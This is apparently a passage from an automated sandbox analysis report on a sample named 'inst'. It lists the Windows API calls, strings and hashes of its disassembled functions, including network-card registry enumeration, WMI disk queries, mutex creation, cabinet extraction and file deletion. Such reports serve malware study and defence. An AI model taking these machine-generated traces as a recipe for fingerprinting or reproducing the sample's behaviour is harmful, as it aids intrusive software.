                                                                                                                                                                                                                        • Part of subcall function 00AF28D0: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00AF291E
                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00000000), ref: 00AF2B18
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00AF2B63
                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00AF2B89
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00AF2BA0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • ServiceName, xrefs: 00AF2ABC
                                                                                                                                                                                                                      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards, xrefs: 00AF2A30
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseEnumOpen_memset$CreateFileQueryValuelstrcmp
                                                                                                                                                                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName
                                                                                                                                                                                                                      • API String ID: 2630661138-1795789498
                                                                                                                                                                                                                      • Opcode ID: b5ac57aea8b694d3496e34b0663b4a2411da7cc77847ccfe21196aa87dba546a
                                                                                                                                                                                                                      • Instruction ID: f72cc60a3258ed6530e76d6e9c991831d59a200920b467eb62325df1e2205e35
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5ac57aea8b694d3496e34b0663b4a2411da7cc77847ccfe21196aa87dba546a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC518171204345AFE724DF94CC86FBBB7E8AB88704F44491DFA9997190EB70E909C762
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(18AE8C58,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F26
                                                                                                                                                                                                                        • Part of subcall function 6C5D6C60: _vswprintf_s.LIBCMT ref: 6C5D6C8A
                                                                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F5B
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F6E
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F7E
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6F9C
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,6C6B4B2B,000000FF), ref: 6C5D6FAD
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 6C5D6FE7
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 6C5D7011
                                                                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 6C5D7029
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 6C5D7034
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Exception@8HeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vswprintf_s
                                                                                                                                                                                                                      • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                                                                      • API String ID: 3526415198-332789905
                                                                                                                                                                                                                      • Opcode ID: 35cba75b26384427c6aa1bc96c26626e8646aff41e0959c1bd6d94bde661d80f
                                                                                                                                                                                                                      • Instruction ID: bff3d72318c3fa41a6911637b93f53e6067083e59dd5cc3a1e8f76cb7a1959d9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35cba75b26384427c6aa1bc96c26626e8646aff41e0959c1bd6d94bde661d80f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B41D3B2A05309AFCB10EF68CCC4BEE77B4EB05304F014A6DE815E3680EF3459498B69
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A94E50
                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00A94E85
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Cabinet.dll,?,771B3170), ref: 00A94EEA
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FDICreate), ref: 00A94F02
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,FDICopy), ref: 00A94F15
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,FDIIsCabinet), ref: 00A94F28
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,FDIDestroy), ref: 00A94F3B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$CurrentLibraryLoadThreadValue
                                                                                                                                                                                                                      • String ID: Cabinet.dll$FDICopy$FDICreate$FDIDestroy$FDIIsCabinet
                                                                                                                                                                                                                      • API String ID: 3141885424-2042144077
                                                                                                                                                                                                                      • Opcode ID: 45ddef1e6d4bc9b43bd31ce2389551dd6d2a3f81a7f63437b01ff4e590484908
                                                                                                                                                                                                                      • Instruction ID: 527008d76c5d2ed8ac53ad7c281a2c8f8d0f9c2f6ae82950d136567c7f1e21a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45ddef1e6d4bc9b43bd31ce2389551dd6d2a3f81a7f63437b01ff4e590484908
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74319074A40709AFDF349F75D845ED6BBE4FB08701B104D6EE66A93190DBB4A581CF80
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AE22E7
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00B3C868,00000000,00000001,00B3C798,?,0000002C,00AE45AD,?,?,?,?,?,?,?,?,?), ref: 00AE2305
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00AE2364
                                                                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AE2389
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00AE2405
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00AE240A
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00AE2460
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d', xrefs: 00AE23A6
                                                                                                                                                                                                                      • WQL, xrefs: 00AE23D0
                                                                                                                                                                                                                      • MediaType, xrefs: 00AE2472
                                                                                                                                                                                                                      • Root\Microsoft\Windows\Storage, xrefs: 00AE232D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeString$BlanketClearCreateH_prolog3InstanceProxyVariant
                                                                                                                                                                                                                      • String ID: MediaType$Root\Microsoft\Windows\Storage$SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d'$WQL
                                                                                                                                                                                                                      • API String ID: 2951287799-4271271752
                                                                                                                                                                                                                      • Opcode ID: c650914b1974db2e26dd256b42d05527ac9790e1eaa4b357899adf1760fc9fc0
                                                                                                                                                                                                                      • Instruction ID: b05648151584882952f54f42e753275b5ed4e36005f17f37100e369de648b47d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c650914b1974db2e26dd256b42d05527ac9790e1eaa4b357899adf1760fc9fc0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D716F7190028AEFDF11DFE4C985EADBBB8EF48304F2484A9F515AB291C7749E45CB21
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AD94EB
                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00AD9504
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD9542
                                                                                                                                                                                                                        • Part of subcall function 00AB6DCF: _vswprintf_s.LIBCMT ref: 00AB6E02
                                                                                                                                                                                                                        • Part of subcall function 00ACD71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD74A
                                                                                                                                                                                                                        • Part of subcall function 00ACD71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD767
                                                                                                                                                                                                                        • Part of subcall function 00ACD71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD77A
                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,0000000C), ref: 00AD9686
                                                                                                                                                                                                                        • Part of subcall function 00ACEE1E: __EH_prolog3.LIBCMT ref: 00ACEE25
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD95F1
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD962F
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?,?,?,?,?,?,?,0000000C), ref: 00AD9656
                                                                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,00000010,?,?), ref: 00AD966A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File_memset$H_prolog3$DeleteDirectoryErrorFindFirstFullLastMoveNamePathRemove_vswprintf_s_wcslen
                                                                                                                                                                                                                      • String ID: %s\%s$%s\*.*
                                                                                                                                                                                                                      • API String ID: 2664728394-1665845743
                                                                                                                                                                                                                      • Opcode ID: c8a4ab7a2da18856ab26af8812e910b8eac8137e7d81ea2820f755e8c4dea215
                                                                                                                                                                                                                      • Instruction ID: 11c0aa63448be5603b2439abbc85a42d6ed9c19c1dce24f8e3e38b70fce24139
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8a4ab7a2da18856ab26af8812e910b8eac8137e7d81ea2820f755e8c4dea215
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D951EE7191025DAADF24EFA4CE45BEF77ACEF08705F00442AB91D9B142EB74A7048B65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ADE7FE
                                                                                                                                                                                                                        • Part of subcall function 00A9ECB6: __EH_prolog3.LIBCMT ref: 00A9ECBD
                                                                                                                                                                                                                        • Part of subcall function 00ADE697: __EH_prolog3.LIBCMT ref: 00ADE69E
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADE887
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00120116,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00ADE8D9
                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00ADE8EA
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00ADE901
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00ADE925
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00ADE92E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileH_prolog3$CloseCreateDeleteHandleWrite_memset_wcslen
                                                                                                                                                                                                                      • String ID: %s\%s.tf
                                                                                                                                                                                                                      • API String ID: 3257772056-3749842194
                                                                                                                                                                                                                      • Opcode ID: 48b5d7f62a5655441468ae66744881f6891a98e3d8059ed886ad80ed2f3fb73e
                                                                                                                                                                                                                      • Instruction ID: 38d5efa29f511b33c20b47824ba89cb2256a5e4c8b82e7c6671cd7fa39cbf308
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48b5d7f62a5655441468ae66744881f6891a98e3d8059ed886ad80ed2f3fb73e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A41A57190014CAFDB25EFA4DD46AFE7BB8FF04310F04412AF916AB291DB709A45CB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(C8A14FE6,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A799D6
                                                                                                                                                                                                                        • Part of subcall function 00A795F0: _vswprintf_s.LIBCMT ref: 00A7961A
                                                                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79A0C
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79A1F
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79A2F
                                                                                                                                                                                                                        • Part of subcall function 00A79FA0: GetProcessHeap.KERNEL32(00000000,00A79A51,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79FA3
                                                                                                                                                                                                                        • Part of subcall function 00A79FA0: HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79FB4
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00A79A7F
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00A79AA6
                                                                                                                                                                                                                        • Part of subcall function 00A79DE0: _memset.LIBCMT ref: 00A79E27
                                                                                                                                                                                                                        • Part of subcall function 00A79DE0: TlsAlloc.KERNEL32 ref: 00A79E53
                                                                                                                                                                                                                        • Part of subcall function 00A79DE0: __CxxThrowException@8.LIBCMT ref: 00A79E73
                                                                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79ABE
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B2CB6B,000000FF), ref: 00A79AC9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Exception@8Throw$AllocHeapMutexProcess$CloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_memset_vswprintf_s
                                                                                                                                                                                                                      • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                                                                      • API String ID: 996444115-332789905
                                                                                                                                                                                                                      • Opcode ID: f955a2fc0a7c786042b06c594c165fb9c4034256f9838e6fd5be8014b41d0c2d
                                                                                                                                                                                                                      • Instruction ID: c1a0c8fe38980b167a32e0942f504c7cb9ae2a124a0ea92e8dba125b9277590c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f955a2fc0a7c786042b06c594c165fb9c4034256f9838e6fd5be8014b41d0c2d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C531FF71901309ABDB20DF65AD45BAF7BB8EB08351F00C16AE828E3291EF348A05CB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsWindow.USER32(?), ref: 00ACF41F
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00ACF446
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005,?), ref: 00ACF4B2
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000415), ref: 00ACF4ED
                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00ACF4FD
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000415), ref: 00ACF50D
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00ACF525
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$ItemText$ClientRectShow
                                                                                                                                                                                                                      • String ID: :$PNG$v
                                                                                                                                                                                                                      • API String ID: 2447831355-1942039661
                                                                                                                                                                                                                      • Opcode ID: 2b862da9a58668d17c3bc8fa03ac264826d2ecde2a614772a4cb0f63bbed6fb0
                                                                                                                                                                                                                      • Instruction ID: 257fd63fac9931d669e6e2740f6607e3b3afc229a242a6989b5ca723c2d37761
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b862da9a58668d17c3bc8fa03ac264826d2ecde2a614772a4cb0f63bbed6fb0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC417CB1900209EFEB119F64DC88EAEBBB9FF08344F10456DF615972A0EB74AA41CF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA2E7
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA301
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA311
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA318
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,00ADA3CA,?,00000000,?), ref: 00ADA327
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00ADA349
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$Global$AllocFindFreeLoadLockSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3537612842-0
                                                                                                                                                                                                                      • Opcode ID: 3c1948de5464c63b52d5f02041e8398a899c1bfe4085e7b5855ba657ae2c55fb
                                                                                                                                                                                                                      • Instruction ID: 4fc1cb7e72aaf89e51e8a3a21ad3bc9ce7882fec3559f2416fe69fdec10d3de8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c1948de5464c63b52d5f02041e8398a899c1bfe4085e7b5855ba657ae2c55fb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20215035100214AFDB226F66EC4CCEF3B6AEF997513244825F826DB220EB35CD529A65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00ACD941
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00ACD957
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00ACD987
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00ACD990
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00ACD999
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00ACD9A2
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00ACD9AE
